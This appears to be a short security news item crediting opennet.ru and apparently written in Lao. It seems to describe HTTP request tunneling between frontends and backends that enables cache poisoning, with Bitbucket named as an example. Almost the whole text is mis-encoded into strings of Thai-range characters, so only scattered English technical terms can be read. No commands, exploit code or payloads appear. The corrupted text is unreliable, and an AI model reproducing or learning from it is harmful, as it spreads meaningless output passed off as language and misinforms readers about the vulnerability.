เบเบฑเบเบเบปเปเบเบเบงเปเบฒเบเบนเปเบเบตเปเปเบเปเบเปเบฒเบเบปเบเบเบฑเบเบซเบฒเบเบฑเบเปเบเปเบชเบฐเปเบซเบเบตเปเบเบฑเบเบเบดเบเบเบฒเบเบฎเปเบญเบเบเป tunneling เปเบเบทเปเบญเปเบเบกเบเบต frontends, เปเบเบเบฒเบเปเบเบทเปเบญเบกเบเปเปเปเบเบเบเปเบฒเบเบซเบฒเบเบเบฑเบ backend เปเบเปเบเบทเบเบชเปเบฒเบเบเบฑเปเบเบเบถเปเบเบชเปเบฒเบฅเบฑเบเปเบเปเบฅเบฐ IP address เปเบฅเบฐเบเบฒเบเบเบฐเบฅเบฒเบเบญเบเบเบญเบเบเบนเปเปเบเปเบเบตเปเปเบเบเบเปเบฒเบเบเบฑเบเบเปเปเปเบเปเบเบฐเบชเบปเบกเบเบฑเบ. เปเบเบฑเบเบเบดเบเบเบตเปเบชเบฐเปเบซเบเบตเบเปเปเบญเบฐเบเบธเบเบฒเบเปเบซเปเบเปเบฒเบเปเบเบเปเบเบเบเปเบฒเบฎเปเบญเบเบเปเบเบญเบเบเบนเปเปเบเปเบญเบทเปเบเป, เปเบเปเปเบฎเบฑเบเปเบซเปเบกเบฑเบเปเบเบฑเบเปเบเปเบเปเบเบตเปเบเบฐเปเบเบฑเบเบเบดเบเบเบญเบ cache เบเบตเปเปเบเปเบฎเปเบงเบกเบเบฑเบ, เปเบเบดเปเบเบเบปเบเบเบฐเบเบปเบเบเปเปเบเบฒเบเบเบธเบเปเบเปเบเบเปเบฒเบฎเปเบญเบเบเปเบญเบทเปเบเป, เปเบฅเบฐเบเปเบงเบเปเบซเปเบเปเบฒเบเบชเบฒเบกเบฒเบเบเปเบฝเบเบชเปเบงเบเบซเบปเบง HTTP เบเบฒเบเปเบเบเบตเปเปเบเปเปเบเบเบฒเบเปเบญเบเบเปเปเบกเบนเบเบเบฒเบเบเปเบฅเบดเบเบฒเบเบเบฒเบ. เบเปเบฒเบเบซเบเปเบฒเปเบเบซเบฒ backend (เบเบปเบงเบขเปเบฒเบเปเบเบฑเปเบ, เปเบกเบทเปเบญเบเบฒเบเบเบงเบเบชเบญเบเบเบงเบฒเบกเบเบทเบเบเปเบญเบเบขเบนเปเบเปเบฒเบเบซเบเปเบฒเปเบเบชเปเบงเบเบซเบปเบงเบเบฑเปเบเบเปเบฒเบงเบชเบฒเบกเบฒเบเบชเบปเปเบเบเปเปเบกเบนเบเบเปเบฝเบงเบเบฑเบเบเบนเปเปเบเปเบเบฐเบเบธเบเบฑเบเปเบเบซเบฒ backend). เปเบเบฑเบเบเบปเบงเบขเปเบฒเบเบเบญเบเบเบฒเบเบเปเบฒเปเบเปเบงเบดเบเบตเบเบฒเบเปเบเบเบฒเบเบเบฐเบเบดเบเบฑเบ, เบเบฒเบเบเปเบฒเปเบเป cache poisoning, เบกเบฑเบเปเบเบฑเบเปเบเปเบเปเบเบตเปเบเบฐเปเบเปเบฎเบฑเบเบเบฒเบเบเบงเบเบเบธเบกเบซเบเปเบฒเปเบงเบฑเบเบเปเบฒเบเปเปเบเบเบฒเบเบเปเบฅเบดเบเบฒเบ Bitbucket.
เปเบซเบผเปเบเบเปเปเบกเบนเบ: opennet.ru